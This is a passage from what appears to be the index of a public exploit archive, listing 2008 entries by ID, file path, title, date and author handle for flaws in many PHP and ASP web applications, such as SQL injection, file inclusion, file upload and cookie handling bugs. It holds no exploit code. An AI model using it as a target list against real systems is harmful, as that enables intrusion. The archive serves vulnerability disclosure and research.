- 'ordercode' SQL Injection",2008-09-07,BugReport.IR,php,webapps, -6396,exploits/php/webapps/6396.txt,"Alstrasoft Forum - 'cat' SQL Injection",2008-09-07,r45c4l,php,webapps, -6397,exploits/php/webapps/6397.txt,"WordPress 2.6.1 - SQL Column Truncation",2008-09-07,irk4z,php,webapps, -6398,exploits/php/webapps/6398.txt,"E-Shop Shopping Cart Script - 'search_results.php' SQL Injection",2008-09-07,Mormoroth,php,webapps, -6401,exploits/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' SQL Injection",2008-09-09,r45c4l,php,webapps, -6402,exploits/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",php,webapps, -6403,exploits/php/webapps/6403.txt,"Hot Links SQL-PHP 3 - 'report.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps, -6404,exploits/php/webapps/6404.txt,"Live TV Script - 'index.php?mid' SQL Injection",2008-09-09,InjEctOr5,php,webapps, -6405,exploits/asp/webapps/6405.txt,"Creator CMS 5.0 - 'sideid' SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps, -6406,exploits/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,php,webapps, -6408,exploits/php/webapps/6408.txt,"CMS Buzz - 'id' SQL Injection",2008-09-09,"security fears team",php,webapps, -6409,exploits/php/webapps/6409.txt,"AvailScript Article Script - 'articles.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps, -6410,exploits/php/webapps/6410.txt,"Kim Websites 1.0 - 'FCKeditor' Arbitrary File Upload",2008-09-09,Ciph3r,php,webapps, -6411,exploits/php/webapps/6411.txt,"AvailScript Photo Album - 'pics.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps, -6412,exploits/php/webapps/6412.txt,"AvailScript Classmate Script - 'viewprofile.php' SQL Injection",2008-09-09,Stack,php,webapps, -6413,exploits/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusions",2008-09-10,SirGod,php,webapps, -6416,exploits/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps, -6417,exploits/php/webapps/6417.txt,"AvailScript Jobs Portal Script - 'jid' SQL Injection",2008-09-10,InjEctOr5,php,webapps, -6419,exploits/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps, -6420,exploits/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps, -6421,exploits/php/webapps/6421.php,"WordPress 2.6.1 - SQL Column Truncation Admin Takeover",2008-09-10,iso^kpsbr,php,webapps, -6422,exploits/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,php,webapps, -6423,exploits/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection",2008-09-10,Cru3l.b0y,php,webapps, -6425,exploits/php/webapps/6425.txt,"PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",php,webapps, -6426,exploits/php/webapps/6426.txt,"Autodealers CMS AutOnline - 'pageid' SQL Injection",2008-09-11,r45c4l,php,webapps, -6427,exploits/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - 'p' Local File Inclusion",2008-09-11,StAkeR,php,webapps, -6428,exploits/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - Cross-Site Scripting / File Disclosure/Bypass / SQL Injection",2008-09-11,"Khashayar Fereidani",php,webapps, -6430,exploits/php/webapps/6430.txt,"D-iscussion Board 3.01 - 'topic' Local File Inclusion",2008-09-11,SirGod,php,webapps, -6431,exploits/php/webapps/6431.pl,"phsBlog 0.2 - Bypass SQL Injection Filtering",2008-09-11,"Khashayar Fereidani",php,webapps, -6432,exploits/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution",2008-09-11,"Khashayar Fereidani",php,webapps, -6433,exploits/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' SQL Injection",2008-09-11,ZoRLu,php,webapps, -6435,exploits/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection",2008-09-11,"Virangar Security",php,webapps, -6436,exploits/php/webapps/6436.txt,"PHPWebGallery 1.3.4 - Blind SQL Injection (1)",2008-09-11,Stack,php,webapps, -6437,exploits/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,php,webapps, -6438,exploits/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass",2008-09-11,Tec-n0x,php,webapps, -6439,exploits/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Arbitrary File Upload",2008-09-12,Stack,php,webapps, -6440,exploits/php/webapps/6440.pl,"PHPWebGallery 1.3.4 - Blind SQL Injection (2)",2008-09-12,ka0x,php,webapps, -6442,exploits/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,php,webapps, -6443,exploits/php/webapps/6443.pl,"WebPortal CMS 0.7.4 - 'download.php' SQL Injection",2008-09-12,StAkeR,php,webapps, -6444,exploits/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' SQL Injection",2008-09-12,r45c4l,php,webapps, -6445,exploits/php/webapps/6445.txt,"SkaLinks 1.5 - 'register.php' Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps, -6446,exploits/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection",2008-09-12,FIREH4CK3R,php,webapps, -6447,exploits/php/webapps/6447.txt,"pNews 2.03 - 'newsid' SQL Injection",2008-09-12,r45c4l,php,webapps, -6448,exploits/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - 'FCKeditor' Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps, -6449,exploits/php/webapps/6449.php,"pLink 2.07 - 'linkto.php' Blind SQL Injection",2008-09-13,Stack,php,webapps, -6450,exploits/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete",2008-09-13,ka0x,php,webapps, -6451,exploits/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps, -6452,exploits/php/webapps/6452.txt,"phpsmartcom 0.2 - Local File Inclusion / SQL Injection",2008-09-13,r3dm0v3,php,webapps, -6453,exploits/asp/webapps/6453.txt,"FoT Video scripti 1.1b - 'oyun' SQL Injection",2008-09-13,Crackers_Child,asp,webapps, -6455,exploits/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",php,webapps, -6456,exploits/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps, -6457,exploits/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps, -6460,exploits/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite - SQL Injection",2008-09-14,~!Dok_tOR!~,php,webapps, -6461,exploits/php/webapps/6461.txt,"cPanel 11.x - 'Fantastico' Local File Inclusion",2008-09-14,joker_1,php,webapps, -6462,exploits/php/webapps/6462.pl,"CzarNews 1.20 - 'cookie' SQL Injection",2008-09-15,StAkeR,php,webapps, -6464,exploits/php/webapps/6464.txt,"CzarNews 1.20 - Account Hijacking SQL Injection",2008-09-15,0ut0fbound,php,webapps, -6465,exploits/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php' SQL Injection",2008-09-15,JosS,php,webapps, -6466,exploits/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple SQL Injections",2008-09-15,SirGod,php,webapps, -6467,exploits/php/webapps/6467.txt,"iScripts EasyIndex - 'produid' SQL Injection",2008-09-16,SirGod,php,webapps, -6468,exploits/php/webapps/6468.txt,"Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps, -6469,exploits/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps, -6470,exploits/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp' Blind SQL Injection",2008-09-16,JosS,asp,webapps, -6473,exploits/php/webapps/6473.txt,"phpRealty 0.3 - 'INC' Remote File Inclusion",2008-09-17,ka0x,php,webapps, -6475,exploits/php/webapps/6475.txt,"PHP Crawler 0.8 - Remote File Inclusion",2008-09-17,Piker,php,webapps, -6478,exploits/php/webapps/6478.txt,"Technote 7 - 'shop_this_skin_path' Remote File Inclusion",2008-09-17,webDEViL,php,webapps, -6480,exploits/php/webapps/6480.txt,"X10media Mp3 Search Engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps, -6482,exploits/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links",2008-09-17,Pepelux,php,webapps, -6483,exploits/php/webapps/6483.txt,"E-PHP CMS - 'article.php' SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps, -6485,exploits/php/webapps/6485.txt,"addalink 4 - 'category_id' SQL Injection",2008-09-18,ka0x,php,webapps, -6486,exploits/php/webapps/6486.txt,"ProArcadeScript 1.3 - 'random' SQL Injection",2008-09-18,SuNHouSe2,php,webapps, -6487,exploits/php/webapps/6487.txt,"CYASK 3.x - 'neturl' Local File Disclosure",2008-09-18,xy7,php,webapps, -6488,exploits/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php' SQL Injection",2008-09-18,SarBoT511,php,webapps, -6489,exploits/php/webapps/6489.txt,"ProActive CMS - 'template' Local File Inclusion",2008-09-18,r45c4l,php,webapps, -6490,exploits/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation",2008-09-18,"Neo Anderson",php,webapps, -6492,exploits/php/webapps/6492.php,"Pluck CMS 4.5.3 - 'update.php' Remote File Corruption",2008-09-19,Nine:Situations:Group,php,webapps, -6494,exploits/php/webapps/6494.txt,"easyLink 1.1.0 - 'detail.php' SQL Injection",2008-09-19,"Egypt Coder",php,webapps, -6495,exploits/php/webapps/6495.txt,"Explay CMS 2.1 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2008-09-19,hodik,php,webapps, -6499,exploits/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps, -6500,exploits/php/webapps/6500.txt,"Explay CMS 2.1 - Insecure Cookie Handling",2008-09-20,Stack,php,webapps, -6501,exploits/php/webapps/6501.txt,"MyFWB 1.0 - 'index.php' SQL Injection",2008-09-20,0x90,php,webapps, -6502,exploits/php/webapps/6502.txt,"Diesel Pay Script - 'area' SQL Injection",2008-09-20,ZoRLu,php,webapps, -6503,exploits/php/webapps/6503.txt,"Plaincart 1.1.2 - 'p' SQL Injection",2008-09-20,r45c4l,php,webapps, -6504,exploits/php/webapps/6504.txt,"Oceandir 2.9 - 'show_vote.php' SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps, -6505,exploits/php/webapps/6505.txt,"jPORTAL 2 - 'humor.php' SQL Injection",2008-09-20,r45c4l,php,webapps, -6507,exploits/php/webapps/6507.php,"Invision Power Board 2.3.5 - SQL Injection",2008-09-21,waraxe,php,webapps, -6508,exploits/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - SQL Injection",2008-09-21,0x90,php,webapps, -6509,exploits/cgi/webapps/6509.txt,"TWiki 4.2.2 - 'action' Remote Code Execution",2008-09-21,webDEViL,cgi,webapps, -6510,exploits/php/webapps/6510.txt,"PHPKB 1.5 Professional - Multiple SQL Injections",2008-09-21,d3v1l,php,webapps, -6511,exploits/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' SQL Injection",2008-09-21,"Hussin X",php,webapps, -6512,exploits/php/webapps/6512.txt,"Diesel Job Site - 'job_id' Blind SQL Injection",2008-09-21,Stack,php,webapps, -6513,exploits/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps, -6514,exploits/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps, -6516,exploits/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - SQL Injection",2008-09-21,boom3rang,php,webapps, -6517,exploits/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,Encrypt3d.M!nd,php,webapps, -6518,exploits/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,Encrypt3d.M!nd,php,webapps, -6519,exploits/php/webapps/6519.php,"PHP iCalendar 2.24 - 'cookie_language' Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,php,webapps, -6520,exploits/php/webapps/6520.txt,"6rbScript 3.3 - 'section.php' Local File Inclusion",2008-09-21,Stack,php,webapps, -6521,exploits/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps, -6522,exploits/php/webapps/6522.txt,"AvailScript Article Script - 'view.php' SQL Injection",2008-09-21,"Hussin X",php,webapps, -6523,exploits/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin",2008-09-22,"CWH Underground",php,webapps, -6524,exploits/php/webapps/6524.txt,"WSN Links 2.22/2.23 - 'vote.php' SQL Injection",2008-09-22,d3v1l,php,webapps, -6525,exploits/php/webapps/6525.txt,"WSN Links 2.20 - 'comments.php' SQL Injection",2008-09-22,d3v1l,php,webapps, -6526,exploits/php/webapps/6526.txt,"PHP iCalendar 2.24 - Insecure Cookie Handling",2008-09-22,Stack,php,webapps, -6527,exploits/php/webapps/6527.txt,"BuzzyWall 1.3.1 - 'search' SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps, -6528,exploits/php/webapps/6528.txt,"WCMS 1.0b - 'news_detail.asp' SQL Injection",2008-09-22,"CWH Underground",php,webapps, -6529,exploits/php/webapps/6529.php,"WSN Links Free 4.0.34P - 'comments.php' Blind SQL Injection",2008-09-22,Stack,php,webapps, -6530,exploits/php/webapps/6530.txt,"OpenElec 3.01 - 'obj' Local File Inclusion",2008-09-22,dun,php,webapps, -6531,exploits/php/webapps/6531.txt,"MyBlog 0.9.8 - Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps, -6533,exploits/php/webapps/6533.txt,"basebuilder 2.0.1 - 'main.inc.php' Remote File Inclusion",2008-09-22,dun,php,webapps, -6535,exploits/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - 'list.php' SQL Injection",2008-09-22,d3v1l,php,webapps, -6536,exploits/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,php,webapps, -6538,exploits/php/webapps/6538.txt,"OpenRat 0.8-beta4 - 'tpl_dir' Remote File Inclusion",2008-09-23,dun,php,webapps, -6539,exploits/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE - 'mod_dir' Remote File Inclusion",2008-09-23,dun,php,webapps, -6540,exploits/php/webapps/6540.pl,"iGaming CMS 1.5 - Multiple SQL Injections",2008-09-23,StAkeR,php,webapps, -6541,exploits/php/webapps/6541.txt,"Galmeta Post CMS 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps, -6542,exploits/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' SQL Injection",2008-09-23,d3v1l,php,webapps, -6543,exploits/php/webapps/6543.txt,"Ol BookMarks Manager 0.7.5 - Local File Inclusion",2008-09-23,dun,php,webapps, -6544,exploits/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - 'code' Remote Code Execution",2008-09-23,GoLd_M,php,webapps, -6545,exploits/php/webapps/6545.txt,"HotScripts Clone - 'cid' SQL Injection",2008-09-24,"Hussin X",php,webapps, -6546,exploits/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin",2008-09-24,ka0x,php,webapps, -6547,exploits/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Local File Inclusion / Remote File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps, -6549,exploits/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,php,webapps, -6550,exploits/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'item_id' SQL Injection",2008-09-24,GoLd_M,php,webapps, -6551,exploits/php/webapps/6551.txt,"emergecolab 1.0 - 'sitecode' Local File Inclusion",2008-09-24,dun,php,webapps, -6552,exploits/php/webapps/6552.txt,"mailwatch 1.0.4 - 'doc' Local File Inclusion",2008-09-24,dun,php,webapps, -6553,exploits/php/webapps/6553.txt,"PHPcounter 1.3.2 - 'defs.php' Local File Inclusion",2008-09-24,dun,php,webapps, -6555,exploits/php/webapps/6555.txt,"Jadu CMS for Government - 'recruit_details.php' SQL Injection",2008-09-24,r45c4l,php,webapps, -6556,exploits/php/webapps/6556.txt,"webcp 0.5.7 - 'filelocation' Remote File Disclosure",2008-09-24,GoLd_M,php,webapps, -6557,exploits/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps, -6558,exploits/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps, -6559,exploits/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps, -6561,exploits/php/webapps/6561.txt,"AJ Auction Pro Platinum - 'seller_id' SQL Injection",2008-09-25,InjEctOr5,php,webapps, -6562,exploits/php/webapps/6562.txt,"LanSuite 3.3.2 - 'design' Local File Inclusion",2008-09-25,dun,php,webapps, -6563,exploits/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - 'act' Local File Inclusion",2008-09-25,dun,php,webapps, -6564,exploits/php/webapps/6564.txt,"Vikingboard 0.2 Beta - 'task' Local File Inclusion",2008-09-25,dun,php,webapps, -6566,exploits/php/webapps/6566.txt,"PHP infoboard 7 plus - Multiple Vulnerabilities",2008-09-25,"CWH Underground",php,webapps, -6567,exploits/php/webapps/6567.pl,"Libra PHP File Manager 1.18/2.0 - Local File Inclusion",2008-09-25,Pepelux,php,webapps, -6568,exploits/php/webapps/6568.txt,"PHP infoBoard 7 - Plus Insecure Cookie Handling",2008-09-25,Stack,php,webapps, -6569,exploits/php/webapps/6569.txt,"Vikingboard 0.2 Beta - SQL Column Truncation",2008-09-25,StAkeR,php,webapps, -6571,exploits/php/webapps/6571.txt,"openEngine 2.0 beta4 - Remote File Inclusion",2008-09-25,dun,php,webapps, -6572,exploits/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection",2008-09-25,d3v1l,php,webapps, -6573,exploits/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps, -6574,exploits/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps, -6575,exploits/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps, -6576,exploits/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - 'Category' SQL Injection",2008-09-26,"CWH Underground",php,webapps, -6577,exploits/php/webapps/6577.txt,"PromoteWeb MySQL - 'id' SQL Injection",2008-09-26,"CWH Underground",php,webapps, -6578,exploits/php/webapps/6578.txt,"212Cafe Board 0.07 - 'qID' SQL Injection",2008-09-26,"CWH Underground",php,webapps, -6579,exploits/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps, -6580,exploits/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps, -6583,exploits/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps, -6584,exploits/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps, -6585,exploits/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps, -6586,exploits/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps, -6587,exploits/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,php,webapps, -6589,exploits/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' SQL Injection",2008-09-26,0x90,php,webapps, -6590,exploits/php/webapps/6590.txt,"ASPapp Knowledge Base - 'CatId' SQL Injection (2)",2008-09-27,Crackers_Child,php,webapps, -6591,exploits/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps, -6592,exploits/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,php,webapps, -6593,exploits/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps, -6594,exploits/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps, -6595,exploits/php/webapps/6595.txt,"Joovili 3.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps, -6596,exploits/php/webapps/6596.txt,"E-Uploader Pro 1.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps, -6598,exploits/php/webapps/6598.txt,"CoAST 0.95 - 'sections_file' Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps, -6599,exploits/php/webapps/6599.txt,"Real Estate Manager 1.01 - 'cat_id' SQL Injection",2008-09-27,CraCkEr,php,webapps, -6601,exploits/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Local File Inclusion",2008-09-27,dun,php,webapps, -6602,exploits/php/webapps/6602.txt,"PlugSpace 0.1 - 'navi' Local File Inclusion",2008-09-27,dun,php,webapps, -6603,exploits/php/webapps/6603.txt,"MyCard 1.0.2 - 'id' SQL Injection",2008-09-27,r45c4l,php,webapps, -6604,exploits/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Local Directory Traversal",2008-09-27,r45c4l,php,webapps, -6605,exploits/php/webapps/6605.txt,"PHP-Lance 1.52 - 'catid' SQL Injection",2008-09-27,InjEctOr5,php,webapps, -6606,exploits/php/webapps/6606.txt,"Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution",2008-09-27,dun,php,webapps, -6607,exploits/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps, -6608,exploits/php/webapps/6608.txt,"ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection",2008-09-28,"Hussin X",php,webapps, -6610,exploits/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,asp,webapps, -6611,exploits/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,php,webapps, -6612,exploits/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps, -6613,exploits/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php' SQL Injection",2008-09-28,S.W.A.T.,php,webapps, -6617,exploits/php/webapps/6617.txt,"BbZL.php 0.92 - 'lien_2' Local Directory Traversal",2008-09-28,JIKO,php,webapps, -6618,exploits/php/webapps/6618.txt,"Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps, -6620,exploits/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' SQL Injection",2008-09-28,boom3rang,php,webapps, -6621,exploits/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps, -6623,exploits/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps, -6624,exploits/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",php,webapps, -6625,exploits/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps, -6626,exploits/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps, -6628,exploits/php/webapps/6628.txt,"ArabCMS - 'rss.php' Local File Inclusion",2008-09-29,JIKO,php,webapps, -6629,exploits/php/webapps/6629.txt,"FAQ Management Script - 'catid' SQL Injection",2008-09-30,"Hussin X",php,webapps, -6631,exploits/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,php,webapps, -6632,exploits/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusions",2008-09-30,DaRkLiFe,php,webapps, -6633,exploits/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary File Upload",2008-09-30,Pepelux,php,webapps, -6634,exploits/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection",2008-09-30,Stack,php,webapps, -6635,exploits/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,php,webapps, -6636,exploits/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,php,webapps, -6637,exploits/php/webapps/6637.txt,"BookMarks Favourites Script - 'id' SQL Injection",2008-09-30,"Hussin X",php,webapps, -6639,exploits/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,php,webapps, -6640,exploits/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,php,webapps, -6641,exploits/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - 'cookie' Local File Inclusion",2008-10-01,JosS,php,webapps, -6642,exploits/php/webapps/6642.txt,"BMForum 5.6 - 'tagname' SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps, -6643,exploits/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps, -6644,exploits/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps, -6645,exploits/php/webapps/6645.txt,"Crux Gallery 1.32 - 'theme' Local File Inclusion",2008-10-01,StAkeR,php,webapps, -6646,exploits/php/webapps/6646.php,"phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution",2008-10-01,EgiX,php,webapps, -6648,exploits/php/webapps/6648.txt,"RPortal 1.1 - 'file_op' Remote File Inclusion",2008-10-01,Kad,php,webapps, -6649,exploits/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps, -6650,exploits/php/webapps/6650.txt,"Link Trader - 'lnkid' SQL Injection",2008-10-01,"Hussin X",php,webapps, -6652,exploits/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,php,webapps, -6653,exploits/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Local File Inclusion",2008-10-02,ZeN,php,webapps, -6655,exploits/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps, -6657,exploits/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps, -6659,exploits/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php' SQL Injection",2008-10-03,"Hussin X",php,webapps, -6662,exploits/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps, -6663,exploits/php/webapps/6663.txt,"CCMS 3.1 - 'skin' Local File Inclusion",2008-10-03,SirGod,php,webapps, -6664,exploits/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps, -6667,exploits/php/webapps/6667.txt,"pPIM 1.01 - 'notes.php' Local File Inclusion",2008-10-04,JosS,php,webapps, -6669,exploits/php/webapps/6669.txt,"JMweb - 'src' Local File Inclusion",2008-10-04,SirGod,php,webapps, -6670,exploits/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary File Upload",2008-10-04,Pepelux,php,webapps, -6674,exploits/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,JosS,php,webapps, -6675,exploits/php/webapps/6675.pl,"Galerie 3.2 - 'pic' WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps, -6676,exploits/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps, -6677,exploits/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' SQL Injection",2008-10-05,Piker,php,webapps, -6678,exploits/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,php,webapps, -6679,exploits/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps, 